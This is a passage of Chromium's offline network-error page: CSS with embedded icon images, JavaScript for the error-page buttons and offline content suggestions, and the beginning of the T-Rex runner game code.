content: url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIyNCIgaGVpZ2h0PSIyNCIgdmlld0JveD0iMCAwIDI0IDI0Ij48cGF0aCBkPSJNMTcgMTAuNVY3YTEgMSAwIDAgMC0xLTFINGExIDEgMCAwIDAtMSAxdjEwYTEgMSAwIDAgMCAxIDFoMTJhMSAxIDAgMCAwIDEtMXYtMy41bDQgNHYtMTFsLTQgNHoiIGZpbGw9IiMzQzQwNDMiLz48L3N2Zz4=);
}
.image-music-note {
content: url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIyNCIgaGVpZ2h0PSIyNCIgdmlld0JveD0iMCAwIDI0IDI0Ij48cGF0aCBkPSJNMTIgM3Y5LjI2Yy0uNS0uMTctMS0uMjYtMS41LS4yNkM4IDEyIDYgMTQgNiAxNi41UzggMjEgMTAuNSAyMXM0LjUtMiA0LjUtNC41VjZoNFYzaC03eiIgZmlsbD0iIzNDNDA0MyIvPjwvc3ZnPg==);
}
.image-earth {
content: url(data:image/svg+xml;base64,PHN2ZyB3aWR0aD0iMjQiIGhlaWdodD0iMjQiIHZpZXdCb3g9IjAgMCAyNCAyNCIgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIj48cGF0aCBkPSJNMTIgMmM1LjUyIDAgMTAgNC40OCAxMCAxMHMtNC40OCAxMC0xMCAxMFMyIDE3LjUyIDIgMTIgNi40OCAyIDEyIDJ6TTQgMTJoNC40YzMuNDA3LjAyMiA0LjkyMiAxLjczIDQuNTQzIDUuMTI3SDkuNDg4djIuNDdhOC4wMDQgOC4wMDQgMCAwIDAgMTAuNDk4LTguMDgzQzE5LjMyNyAxMi41MDQgMTguMzMyIDEzIDE3IDEzYy0yLjEzNyAwLTMuMjA2LS45MTYtMy4yMDYtMi43NWgtMy43NDhjLS4yNzQtMi43MjguNjgzLTQuMDkyIDIuODctNC4wOTIgMC0uOTc1LjMyNy0xLjU5Ny44MTEtMS45N0E4LjAwNCA4LjAwNCAwIDAgMCA0IDEyeiIgZmlsbD0iIzNDNDA0MyIvPjwvc3ZnPg==);
}
.image-file {
content: url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIyNCIgaGVpZ2h0PSIyNCIgdmlld0JveD0iMCAwIDI0IDI0Ij48cGF0aCBkPSJNMTMgOVYzLjVMMTguNSA5TTYgMmMtMS4xMSAwLTIgLjg5LTIgMnYxNmEyIDIgMCAwIDAgMiAyaDEyYTIgMiAwIDAgMCAyLTJWOGwtNi02SDZ6IiBmaWxsPSIjM0M0MDQzIi8+PC9zdmc+);
}
.offline-content-suggestion-texts {
display: flex;
flex-direction: column;
justify-content: space-between;
line-height: 1.3;
padding: .9em;
width: 100%;
}
.offline-content-suggestion-title {
-webkit-box-orient: vertical;
-webkit-line-clamp: 3;
color: rgb(32, 33, 36);
display: -webkit-box;
font-size: 1.1em;
overflow: hidden;
text-overflow: ellipsis;
}
div.offline-content-suggestion {
align-items: stretch;
border: 1px solid rgb(218, 220, 224);
border-radius: 8px;
display: flex;
justify-content: space-between;
margin-bottom: .8em;
}
.suggestion-with-image {
flex-direction: row;
height: 8.2em;
max-height: 8.2em;
}
.suggestion-with-icon {
flex-direction: row-reverse;
height: 4.2em;
max-height: 4.2em;
}
.suggestion-with-icon .offline-content-suggestion-title {
-webkit-line-clamp: 1;
word-break: break-all;
}
.suggestion-with-icon .offline-content-suggestion-texts {
padding-inline-start: 0;
}
.offline-content-suggestion-attribution-freshness {
color: rgb(95, 99, 104);
display: flex;
font-size: .8em;
line-height: 1.7em;
}
.offline-content-suggestion-attribution {
-webkit-box-orient: vertical;
-webkit-line-clamp: 1;
display: -webkit-box;
flex-shrink: 1;
margin-inline-end: 0.3em;
overflow: hidden;
overflow-wrap: break-word;
text-overflow: ellipsis;
word-break: break-all;
}
.no-attribution .offline-content-suggestion-attribution {
display: none;
}
.offline-content-suggestion-freshness::before {
content: '-';
display: inline-block;
flex-shrink: 0;
margin-inline-end: .1em;
margin-inline-start: .1em;
}
.no-attribution .offline-content-suggestion-freshness::before {
display: none;
}
.offline-content-suggestion-freshness {
flex-shrink: 0;
}
.suggestion-with-image .offline-content-suggestion-pin-spacer {
flex-grow: 100;
flex-shrink: 1;
}
.suggestion-with-image .offline-content-suggestion-pin {
content: url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2aWV3Qm94PSIwIDAgMjQgMjQiIHdpZHRoPSIyNCIgaGVpZ2h0PSIyNCI+PGRlZnM+PHBhdGggaWQ9ImEiIGQ9Ik0wIDBoMjR2MjRIMFYweiIvPjwvZGVmcz48Y2xpcFBhdGggaWQ9ImIiPjx1c2UgeGxpbms6aHJlZj0iI2EiIG92ZXJmbG93PSJ2aXNpYmxlIi8+PC9jbGlwUGF0aD48cGF0aCBjbGlwLXBhdGg9InVybCgjYikiIGQ9Ik0xMiAyQzYuNSAyIDIgNi41IDIgMTJzNC41IDEwIDEwIDEwIDEwLTQuNSAxMC0xMFMxNy41IDIgMTIgMnptNSAxNkg3di0yaDEwdjJ6bS02LjctNEw3IDEwLjdsMS40LTEuNCAxLjkgMS45IDUuMy01LjNMMTcgNy4zIDEwLjMgMTR6IiBmaWxsPSIjOUFBMEE2Ii8+PC9zdmc+);
flex-shrink: 0;
height: 1.4em;
margin-inline-start: .4em;
width: 1.4em;
}
/* Controls the animation (and a bit more) of the launch-downloads-home action
* button when the offline content list is expanded/shown.
*/
#offline-content-list-action {
text-align: center;
transition: visibility 0s 200ms, opacity 200ms 200ms linear;
}
/* Controls the animation of the launch-downloads-home action button when the
* offline content list is collapsed/hidden.
*/
#offline-content-list.list-hidden #offline-content-list-action {
opacity: 0;
transition: opacity 200ms linear, visibility 0s 200ms;
visibility: hidden;
}
#cancel-save-page-button {
background-image: url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHZpZXdCb3g9IjAgMCAyNCAyNCIgd2lkdGg9IjI0IiBoZWlnaHQ9IjI0Ij48Y2xpcFBhdGggaWQ9Im1hc2siPjxwYXRoIGQ9Ik0xMiAyQzYuNSAyIDIgNi41IDIgMTJzNC41IDEwIDEwIDEwIDEwLTQuNSAxMC0xMFMxNy41IDIgMTIgMnptNSAxNkg3di0yaDEwdjJ6bS02LjctNEw3IDEwLjdsMS40LTEuNCAxLjkgMS45IDUuMy01LjNMMTcgNy4zIDEwLjMgMTR6IiBmaWxsPSIjOUFBMEE2Ii8+PC9jbGlwUGF0aD48cGF0aCBjbGlwLXBhdGg9InVybCgjbWFzaykiIGZpbGw9IiM5QUEwQTYiIGQ9Ik0wIDBoMjR2MjRIMHoiLz48cGF0aCBjbGlwLXBhdGg9InVybCgjbWFzaykiIGZpbGw9IiMxQTczRTgiIHN0eWxlPSJhbmltYXRpb246b2ZmbGluZUFuaW1hdGlvbiA0cyBpbmZpbml0ZSIgZD0iTTAgMGgyNHYyNEgweiIvPjxzdHlsZT5Aa2V5ZnJhbWVzIG9mZmxpbmVBbmltYXRpb257MCUsMzUle2hlaWdodDowfTYwJXtoZWlnaHQ6MTAwJX05MCV7ZmlsbC1vcGFjaXR5OjF9dG97ZmlsbC1vcGFjaXR5OjB9fTwvc3R5bGU+PC9zdmc+);
background-position: right 27px center;
background-repeat: no-repeat;
border: 1px solid var(--google-gray-300);
border-radius: 5px;
color: var(--google-gray-700);
margin-bottom: 26px;
padding-bottom: 16px;
padding-inline-end: 88px;
padding-inline-start: 16px;
padding-top: 16px;
text-align: start;
}
html[dir='rtl'] #cancel-save-page-button {
background-position: left 27px center;
}
#save-page-for-later-button {
display: flex;
justify-content: start;
}
#save-page-for-later-button a::before {
content: url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIxLjJlbSIgaGVpZ2h0PSIxLjJlbSIgdmlld0JveD0iMCAwIDI0IDI0Ij48cGF0aCBkPSJNNSAyMGgxNHYtMkg1bTE0LTloLTRWM0g5djZINWw3IDcgNy03eiIgZmlsbD0iIzQyODVGNCIvPjwvc3ZnPg==);
display: inline-block;
margin-inline-end: 4px;
vertical-align: -webkit-baseline-middle;
}
.hidden#save-page-for-later-button {
display: none;
}
/* Don't allow overflow when in a subframe. */
html[subframe] body {
overflow: hidden;
}
#sub-frame-error {
-webkit-align-items: center;
-webkit-flex-flow: column;
-webkit-justify-content: center;
background-color: #DDD;
display: -webkit-flex;
height: 100%;
left: 0;
position: absolute;
text-align: center;
top: 0;
transition: background-color 200ms ease-in-out;
width: 100%;
}
#sub-frame-error:hover {
background-color: #EEE;
}
#sub-frame-error .icon-generic {
margin: 0 0 16px;
}
#sub-frame-error-details {
margin: 0 10px;
text-align: center;
visibility: hidden;
}
/* Show details only when hovering. */
#sub-frame-error:hover #sub-frame-error-details {
visibility: visible;
}
/* If the iframe is too small, always hide the error code. */
/* TODO(mmenke): See if overflow: no-display works better, once supported. */
@media (max-width: 200px), (max-height: 95px) {
#sub-frame-error-details {
display: none;
}
}
/* Adjust icon for small embedded frames in apps. */
@media (max-height: 100px) {
#sub-frame-error .icon-generic {
height: auto;
margin: 0;
padding-top: 0;
width: 25px;
}
}
/* details-button is special; it's a <button> element that looks like a link. */
#details-button {
box-shadow: none;
min-width: 0;
}
/* Styles for platform dependent separation of controls and details button. */
.suggested-left > #control-buttons,
.suggested-right > #details-button {
float: left;
}
.suggested-right > #control-buttons,
.suggested-left > #details-button {
float: right;
}
.suggested-left .secondary-button {
margin-inline-end: 0;
margin-inline-start: 16px;
}
#details-button.singular {
float: none;
}
/* download-button shows both icon and text. */
#download-button {
padding-bottom: 4px;
padding-top: 4px;
position: relative;
}
#download-button::before {
background: -webkit-image-set(
url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABgAAAAYCAQAAABKfvVzAAAAO0lEQVQ4y2NgGArgPxIY1YChsOE/LtBAmpYG0mxpIOSDBpKUo2lpIDZxNJCkHKqlYZAla3RAHQ1DFgAARRroHyLNTwwAAAAASUVORK5CYII=) 1x,
url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAADAAAAAwCAQAAAD9CzEMAAAAZElEQVRYw+3Ruw3AMAwDUY3OzZUmRRD4E9iim9wNwAdbEURHyk4AAAAATiCVK8lLyPsKeT9K3lsownnunfkPxO78hKiYHxBV8x2icr5BVM+/CMf8g3DN34Rzns6ViwHUAUQ/6wIAd5Km7l6c8AAAAABJRU5ErkJggg==) 2x)
no-repeat;
content: '';
display: inline-block;
height: 24px;
margin-inline-end: 4px;
margin-inline-start: -4px;
vertical-align: middle;
width: 24px;
}
#download-button:disabled {
background: rgb(180, 206, 249);
color: rgb(255, 255, 255);
}
#buttons::after {
clear: both;
content: '';
display: block;
width: 100%;
}
/* Offline page */
html[dir='rtl'] .runner-container,
html[dir='rtl'].offline .icon-offline {
transform: scaleX(-1);
}
.offline {
transition: filter 1.5s cubic-bezier(0.65, 0.05, 0.36, 1),
background-color 1.5s cubic-bezier(0.65, 0.05, 0.36, 1);
will-change: filter, background-color;
}
.offline body {
transition: background-color 1.5s cubic-bezier(0.65, 0.05, 0.36, 1);
}
.offline #main-message > p {
display: none;
}
.offline.inverted {
background-color: #fff;
filter: invert(1);
}
.offline.inverted body {
background-color: #fff;
}
.offline .interstitial-wrapper {
color: var(--text-color);
font-size: 1em;
line-height: 1.55;
margin: 0 auto;
max-width: 600px;
padding-top: 100px;
position: relative;
width: 100%;
}
.offline .runner-container {
direction: ltr;
height: 150px;
max-width: 600px;
overflow: hidden;
position: absolute;
top: 35px;
width: 44px;
}
.offline .runner-container:focus {
outline: none;
}
.offline .runner-container:focus-visible {
outline: 3px solid var(--google-blue-300);
}
.offline .runner-canvas {
height: 150px;
max-width: 600px;
opacity: 1;
overflow: hidden;
position: absolute;
top: 0;
z-index: 10;
}
.offline .controller {
height: 100vh;
left: 0;
position: absolute;
top: 0;
width: 100vw;
z-index: 9;
}
#offline-resources {
display: none;
}
#offline-instruction {
image-rendering: pixelated;
left: 0;
margin: auto;
position: absolute;
right: 0;
top: 60px;
width: fit-content;
}
.offline-runner-live-region {
bottom: 0;
clip-path: polygon(0 0, 0 0, 0 0);
color: var(--background-color);
display: block;
font-size: xx-small;
overflow: hidden;
position: absolute;
text-align: center;
transition: color 1.5s cubic-bezier(0.65, 0.05, 0.36, 1);
user-select: none;
}
/* Custom toggle */
.slow-speed-option {
align-items: center;
background: var(--google-gray-50);
border-radius: 24px/50%;
bottom: 0;
color: var(--error-code-color);
display: inline-flex;
font-size: 1em;
left: 0;
line-height: 1.1em;
margin: 5px auto;
padding: 2px 12px 3px 20px;
position: absolute;
right: 0;
width: max-content;
z-index: 999;
}
.slow-speed-option.hidden {
display: none;
}
.slow-speed-option [type=checkbox] {
opacity: 0;
pointer-events: none;
position: absolute;
}
.slow-speed-option .slow-speed-toggle {
cursor: pointer;
margin-inline-start: 8px;
padding: 8px 4px;
position: relative;
}
.slow-speed-option [type=checkbox]:disabled ~ .slow-speed-toggle {
cursor: default;
}
.slow-speed-option-label [type=checkbox] {
opacity: 0;
pointer-events: none;
position: absolute;
}
.slow-speed-option .slow-speed-toggle::before,
.slow-speed-option .slow-speed-toggle::after {
content: '';
display: block;
margin: 0 3px;
transition: all 100ms cubic-bezier(0.4, 0, 1, 1);
}
.slow-speed-option .slow-speed-toggle::before {
background: rgb(189,193,198);
border-radius: 0.65em;
height: 0.9em;
width: 2em;
}
.slow-speed-option .slow-speed-toggle::after {
background: #fff;
border-radius: 50%;
box-shadow: 0 1px 3px 0 rgb(0 0 0 / 40%);
height: 1.2em;
position: absolute;
top: 51%;
transform: translate(-20%, -50%);
width: 1.1em;
}
.slow-speed-option [type=checkbox]:focus + .slow-speed-toggle {
box-shadow: 0 0 8px rgb(94, 158, 214);
outline: 1px solid rgb(93, 157, 213);
}
.slow-speed-option [type=checkbox]:checked + .slow-speed-toggle::before {
background: var(--google-blue-600);
opacity: 0.5;
}
.slow-speed-option [type=checkbox]:checked + .slow-speed-toggle::after {
background: var(--google-blue-600);
transform: translate(calc(2em - 90%), -50%);
}
.slow-speed-option [type=checkbox]:checked:disabled +
.slow-speed-toggle::before {
background: rgb(189,193,198);
}
.slow-speed-option [type=checkbox]:checked:disabled +
.slow-speed-toggle::after {
background: var(--google-gray-50);
}
@media (max-width: 420px) {
#download-button {
padding-bottom: 12px;
padding-top: 12px;
}
.suggested-left > #control-buttons,
.suggested-right > #control-buttons {
float: none;
}
.snackbar {
border-radius: 0;
bottom: 0;
left: 0;
width: 100%;
}
}
@media (max-height: 350px) {
h1 {
margin: 0 0 15px;
}
.icon-offline {
margin: 0 0 10px;
}
.interstitial-wrapper {
margin-top: 5%;
}
.nav-wrapper {
margin-top: 30px;
}
}
@media (min-width: 420px) and (max-width: 736px) and
(min-height: 240px) and (max-height: 420px) and
(orientation:landscape) {
.interstitial-wrapper {
margin-bottom: 100px;
}
}
@media (max-width: 360px) and (max-height: 480px) {
.offline .interstitial-wrapper {
padding-top: 60px;
}
.offline .runner-container {
top: 8px;
}
}
@media (min-height: 240px) and (orientation: landscape) {
.offline .interstitial-wrapper {
margin-bottom: 90px;
}
.icon-offline {
margin-bottom: 20px;
}
}
@media (max-height: 320px) and (orientation: landscape) {
.icon-offline {
margin-bottom: 0;
}
.offline .runner-container {
top: 10px;
}
}
@media (max-width: 240px) {
button {
padding-inline-end: 12px;
padding-inline-start: 12px;
}
.interstitial-wrapper {
overflow: inherit;
padding: 0 8px;
}
}
@media (max-width: 120px) {
button {
width: auto;
}
}
.arcade-mode,
.arcade-mode .runner-container,
.arcade-mode .runner-canvas {
image-rendering: pixelated;
max-width: 100%;
overflow: hidden;
}
.arcade-mode #buttons,
.arcade-mode #main-content {
opacity: 0;
overflow: hidden;
}
.arcade-mode .interstitial-wrapper {
height: 100vh;
max-width: 100%;
overflow: hidden;
}
.arcade-mode .runner-container {
left: 0;
margin: auto;
right: 0;
transform-origin: top center;
transition: transform 250ms cubic-bezier(0.4, 0, 1, 1) 400ms;
z-index: 2;
}
@media (prefers-color-scheme: dark) {
.icon {
filter: invert(1);
}
.offline .runner-canvas {
filter: invert(1);
}
.offline.inverted {
background-color: var(--background-color);
filter: invert(0);
}
.offline.inverted body {
background-color: #fff;
}
.offline.inverted .offline-runner-live-region {
color: #fff;
}
#suggestions-list a {
color: var(--link-color);
}
#error-information-button {
filter: invert(0.6);
}
.slow-speed-option {
background: var(--google-gray-800);
color: var(--google-gray-100);
}
.slow-speed-option .slow-speed-toggle::before,
.slow-speed-option [type=checkbox]:checked:disabled +
.slow-speed-toggle::before {
background: rgb(189,193,198);
}
.slow-speed-option [type=checkbox]:checked + .slow-speed-toggle::after,
.slow-speed-option [type=checkbox]:checked + .slow-speed-toggle::before {
background: var(--google-blue-300);
}
}
</style>
<script>// Copyright 2013 The Chromium Authors
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
/**
* @typedef {{
* downloadButtonClick: function(),
* reloadButtonClick: function(string),
* detailsButtonClick: function(),
* diagnoseErrorsButtonClick: function(),
* trackEasterEgg: function(),
* updateEasterEggHighScore: function(number),
* resetEasterEggHighScore: function(),
* launchOfflineItem: function(string, string),
* savePageForLater: function(),
* cancelSavePage: function(),
* listVisibilityChange: function(boolean),
* }}
*/
// eslint-disable-next-line no-var
var errorPageController;
const HIDDEN_CLASS = 'hidden';
// Decodes a UTF16 string that is encoded as base64.
function decodeUTF16Base64ToString(encoded_text) {
const data = atob(encoded_text);
let result = '';
for (let i = 0; i < data.length; i += 2) {
result +=
String.fromCharCode(data.charCodeAt(i) * 256 + data.charCodeAt(i + 1));
}
return result;
}
function toggleHelpBox() {
const helpBoxOuter = document.getElementById('details');
helpBoxOuter.classList.toggle(HIDDEN_CLASS);
const detailsButton = document.getElementById('details-button');
if (helpBoxOuter.classList.contains(HIDDEN_CLASS)) {
/** @suppress {missingProperties} */
detailsButton.innerText = detailsButton.detailsText;
} else {
/** @suppress {missingProperties} */
detailsButton.innerText = detailsButton.hideDetailsText;
}
// Details appears over the main content on small screens.
if (mobileNav) {
document.getElementById('main-content').classList.toggle(HIDDEN_CLASS);
const runnerContainer = document.querySelector('.runner-container');
if (runnerContainer) {
runnerContainer.classList.toggle(HIDDEN_CLASS);
}
}
}
function diagnoseErrors() {
if (window.errorPageController) {
errorPageController.diagnoseErrorsButtonClick();
}
}
// Subframes use a different layout but the same html file. This is to make it
// easier to support platforms that load the error page via different
// mechanisms (Currently just iOS). We also use the subframe style for portals
// as they are embedded like subframes and can't be interacted with by the user.
let isSubFrame = false;
if (window.top.location !== window.location || window.portalHost) {
document.documentElement.setAttribute('subframe', '');
isSubFrame = true;
}
// Re-renders the error page using |strings| as the dictionary of values.
// Used by NetErrorTabHelper to update DNS error pages with probe results.
function updateForDnsProbe(strings) {
const context = new JsEvalContext(strings);
jstProcess(context, document.getElementById('t'));
onDocumentLoadOrUpdate();
}
// Adds an icon class to the list and removes classes previously set.
function updateIconClass(newClass) {
const frameSelector = isSubFrame ? '#sub-frame-error' : '#main-frame-error';
const iconEl = document.querySelector(frameSelector + ' .icon');
if (iconEl.classList.contains(newClass)) {
return;
}
iconEl.className = 'icon ' + newClass;
}
// Implements button clicks. This function is needed during the transition
// between implementing these in trunk chromium and implementing them in iOS.
function reloadButtonClick(url) {
if (window.errorPageController) {
//
//
errorPageController.reloadButtonClick();
//
} else {
window.location = url;
}
}
function downloadButtonClick() {
if (window.errorPageController) {
errorPageController.downloadButtonClick();
const downloadButton = document.getElementById('download-button');
downloadButton.disabled = true;
/** @suppress {missingProperties} */
downloadButton.textContent = downloadButton.disabledText;
document.getElementById('download-link-wrapper')
.classList.add(HIDDEN_CLASS);
document.getElementById('download-link-clicked-wrapper')
.classList.remove(HIDDEN_CLASS);
}
}
function detailsButtonClick() {
if (window.errorPageController) {
errorPageController.detailsButtonClick();
}
}
let primaryControlOnLeft = true;
// clang-format off
//
// clang-format on
primaryControlOnLeft = false;
//
function setAutoFetchState(scheduled, can_schedule) {
document.getElementById('cancel-save-page-button')
.classList.toggle(HIDDEN_CLASS, !scheduled);
document.getElementById('save-page-for-later-button')
.classList.toggle(HIDDEN_CLASS, scheduled || !can_schedule);
}
function savePageLaterClick() {
errorPageController.savePageForLater();
// savePageForLater will eventually trigger a call to setAutoFetchState() when
// it completes.
}
function cancelSavePageClick() {
errorPageController.cancelSavePage();
// setAutoFetchState is not called in response to cancelSavePage(), so do it
// now.
setAutoFetchState(false, true);
}
function toggleErrorInformationPopup() {
document.getElementById('error-information-popup-container')
.classList.toggle(HIDDEN_CLASS);
}
function launchOfflineItem(itemID, name_space) {
errorPageController.launchOfflineItem(itemID, name_space);
}
function launchDownloadsPage() {
errorPageController.launchDownloadsPage();
}
function getIconForSuggestedItem(item) {
// Note: |item.content_type| contains the enum values from
// chrome::mojom::AvailableContentType.
switch (item.content_type) {
case 1: // kVideo
return 'image-video';
case 2: // kAudio
return 'image-music-note';
case 0: // kPrefetchedPage
case 3: // kOtherPage
return 'image-earth';
}
return 'image-file';
}
function getSuggestedContentDiv(item, index) {
// Note: See AvailableContentToValue in available_offline_content_helper.cc
// for the data contained in an |item|.
// TODO(carlosk): Present |snippet_base64| when that content becomes
// available.
let thumbnail = '';
const extraContainerClasses = [];
// html_inline.py will try to replace src attributes with data URIs using a
// simple regex. The following is obfuscated slightly to avoid that.
const source = 'src';
if (item.thumbnail_data_uri) {
extraContainerClasses.push('suggestion-with-image');
thumbnail = `<img ${source}="${item.thumbnail_data_uri}">`;
} else {
extraContainerClasses.push('suggestion-with-icon');
const iconClass = getIconForSuggestedItem(item);
thumbnail = `<div><img class="${iconClass}"></div>`;
}
let favicon = '';
if (item.favicon_data_uri) {
favicon = `<img ${source}="${item.favicon_data_uri}">`;
} else {
extraContainerClasses.push('no-favicon');
}
if (!item.attribution_base64) {
extraContainerClasses.push('no-attribution');
}
return `
<div class="offline-content-suggestion ${extraContainerClasses.join(' ')}"
onclick="launchOfflineItem('${item.ID}', '${item.name_space}')">
<div class="offline-content-suggestion-texts">
<div id="offline-content-suggestion-title-${index}"
class="offline-content-suggestion-title">
</div>
<div class="offline-content-suggestion-attribution-freshness">
<div id="offline-content-suggestion-favicon-${index}"
class="offline-content-suggestion-favicon">
${favicon}
</div>
<div id="offline-content-suggestion-attribution-${index}"
class="offline-content-suggestion-attribution">
</div>
<div class="offline-content-suggestion-freshness">
${item.date_modified}
</div>
<div class="offline-content-suggestion-pin-spacer"></div>
<div class="offline-content-suggestion-pin"></div>
</div>
</div>
<div class="offline-content-suggestion-thumbnail">
${thumbnail}
</div>
</div>`;
}
/**
* @typedef {{
* ID: string,
* name_space: string,
* title_base64: string,
* snippet_base64: string,
* date_modified: string,
* attribution_base64: string,
* thumbnail_data_uri: string,
* favicon_data_uri: string,
* content_type: number,
* }}
*/
let AvailableOfflineContent;
// Populates a list of suggested offline content.
// Note: For security reasons all content downloaded from the web is considered
// unsafe and must be securely handled to be presented on the dino page. Images
// have already been safely re-encoded but textual content -- like title and
// attribution -- must be properly handled here.
// @param {boolean} isShown
// @param {Array<AvailableOfflineContent>} suggestions
function offlineContentAvailable(isShown, suggestions) {
if (!suggestions || !loadTimeData.valueExists('offlineContentList')) {
return;
}
const suggestionsHTML = [];
for (let index = 0; index < suggestions.length; index++) {
suggestionsHTML.push(getSuggestedContentDiv(suggestions[index], index));
}
document.getElementById('offline-content-suggestions').innerHTML =
suggestionsHTML.join('\n');
// Sets textual web content using |textContent| to make sure it's handled as
// plain text.
for (let index = 0; index < suggestions.length; index++) {
document.getElementById(`offline-content-suggestion-title-${index}`)
.textContent =
decodeUTF16Base64ToString(suggestions[index].title_base64);
document.getElementById(`offline-content-suggestion-attribution-${index}`)
.textContent =
decodeUTF16Base64ToString(suggestions[index].attribution_base64);
}
const contentListElement = document.getElementById('offline-content-list');
if (document.dir === 'rtl') {
contentListElement.classList.add('is-rtl');
}
contentListElement.hidden = false;
// The list is configured as hidden by default. Show it if needed.
if (isShown) {
toggleOfflineContentListVisibility(false);
}
}
function toggleOfflineContentListVisibility(updatePref) {
if (!loadTimeData.valueExists('offlineContentList')) {
return;
}
const contentListElement = document.getElementById('offline-content-list');
const isVisible = !contentListElement.classList.toggle('list-hidden');
if (updatePref && window.errorPageController) {
errorPageController.listVisibilityChanged(isVisible);
}
}
// Called on document load, and from updateForDnsProbe().
function onDocumentLoadOrUpdate() {
const downloadButtonVisible = loadTimeData.valueExists('downloadButton') &&
loadTimeData.getValue('downloadButton').msg;
const detailsButton = document.getElementById('details-button');
// If offline content suggestions will be visible, the usual buttons will not
// be presented.
const offlineContentVisible =
loadTimeData.valueExists('suggestedOfflineContentPresentation');
if (offlineContentVisible) {
document.querySelector('.nav-wrapper').classList.add(HIDDEN_CLASS);
detailsButton.classList.add(HIDDEN_CLASS);
document.getElementById('download-link').hidden = !downloadButtonVisible;
document.getElementById('download-links-wrapper')
.classList.remove(HIDDEN_CLASS);
document.getElementById('error-information-popup-container')
.classList.add('use-popup-container', HIDDEN_CLASS);
document.getElementById('error-information-button')
.classList.remove(HIDDEN_CLASS);
}
const attemptAutoFetch = loadTimeData.valueExists('attemptAutoFetch') &&
loadTimeData.getValue('attemptAutoFetch');
const reloadButtonVisible = loadTimeData.valueExists('reloadButton') &&
loadTimeData.getValue('reloadButton').msg;
const reloadButton = document.getElementById('reload-button');
const downloadButton = document.getElementById('download-button');
if (reloadButton.style.display === 'none' &&
downloadButton.style.display === 'none') {
detailsButton.classList.add('singular');
}
// Show or hide control buttons.
const controlButtonDiv = document.getElementById('control-buttons');
controlButtonDiv.hidden =
offlineContentVisible || !(reloadButtonVisible || downloadButtonVisible);
const iconClass = loadTimeData.valueExists('iconClass') &&
loadTimeData.getValue('iconClass');
updateIconClass(iconClass);
if (!isSubFrame && iconClass === 'icon-offline') {
document.documentElement.classList.add('offline');
new Runner('.interstitial-wrapper');
}
}
function onDocumentLoad() {
// Sets up the proper button layout for the current platform.
const buttonsDiv = document.getElementById('buttons');
if (primaryControlOnLeft) {
buttonsDiv.classList.add('suggested-left');
} else {
buttonsDiv.classList.add('suggested-right');
}
onDocumentLoadOrUpdate();
}
document.addEventListener('DOMContentLoaded', onDocumentLoad);
</script>
<script>// Copyright 2015 The Chromium Authors
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
let mobileNav = false;
/**
* For small screen mobile the navigation buttons are moved
* below the advanced text.
*/
function onResize() {
const helpOuterBox = document.querySelector('#details');
const mainContent = document.querySelector('#main-content');
const mediaQuery = '(min-width: 240px) and (max-width: 420px) and ' +
'(min-height: 401px), ' +
'(max-height: 560px) and (min-height: 240px) and ' +
'(min-width: 421px)';
const detailsHidden = helpOuterBox.classList.contains(HIDDEN_CLASS);
const runnerContainer = document.querySelector('.runner-container');
// Check for change in nav status.
if (mobileNav !== window.matchMedia(mediaQuery).matches) {
mobileNav = !mobileNav;
// Handle showing the top content / details sections according to state.
if (mobileNav) {
mainContent.classList.toggle(HIDDEN_CLASS, !detailsHidden);
helpOuterBox.classList.toggle(HIDDEN_CLASS, detailsHidden);
if (runnerContainer) {
runnerContainer.classList.toggle(HIDDEN_CLASS, !detailsHidden);
}
} else if (!detailsHidden) {
// Non mobile nav with visible details.
mainContent.classList.remove(HIDDEN_CLASS);
helpOuterBox.classList.remove(HIDDEN_CLASS);
if (runnerContainer) {
runnerContainer.classList.remove(HIDDEN_CLASS);
}
}
}
}
function setupMobileNav() {
window.addEventListener('resize', onResize);
onResize();
}
document.addEventListener('DOMContentLoaded', setupMobileNav);
</script>
<script>// Copyright 2014 The Chromium Authors
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
/**
* T-Rex runner.
* @param {string} outerContainerId Outer containing element id.
* @param {!Object=} opt_config
* @constructor
* @implements {EventListener}
* @export
*/
function Runner(outerContainerId, opt_config) {
// Singleton
if (Runner.instance_) {
return Runner.instance_;
}
Runner.instance_ = this;
this.outerContainerEl = document.querySelector(outerContainerId);
this.containerEl = null;
this.snackbarEl = null;
// A div to intercept touch events. Only set while (playing && useTouch).
this.touchController = null;
this.config = opt_config || Object.assign(Runner.config, Runner.normalConfig);
// Logical dimensions of the container.
this.dimensions = Runner.defaultDimensions;
this.gameType = null;
Runner.spriteDefinition = Runner.spriteDefinitionByType['original'];
this.altGameImageSprite = null;
this.altGameModeActive = false;
this.altGameModeFlashTimer = null;
this.fadeInTimer = 0;
this.canvas = null;
this.canvasCtx = null;
this.tRex = null;
this.distanceMeter = null;
this.distanceRan = 0;
this.highestScore = 0;
this.syncHighestScore = false;
this.time = 0;
this.runningTime = 0;
this.msPerFrame = 1000 / FPS;
this.currentSpeed = this.config.SPEED;
Runner.slowDown = false;
this.obstacles = [];
this.activated = false; // Whether the easter egg has been activated.
this.playing = false; // Whether the game is currently in play state.
this.crashed = false;
this.paused = false;
this.inverted = false;
this.invertTimer = 0;
this.resizeTimerId_ = null;
this.playCount = 0;
// Sound FX.
this.audioBuffer = null;
/** @type {Object} */
this.soundFx = {};
this.generatedSoundFx = null;
// Global web audio context for playing sounds.
this.audioContext = null;
// Images.
this.images = {};
this.imagesLoaded = 0;
// Gamepad state.
this.pollingGamepads = false;
this.gamepadIndex = undefined;
this.previousGamepad = null;
if (this.isDisabled()) {
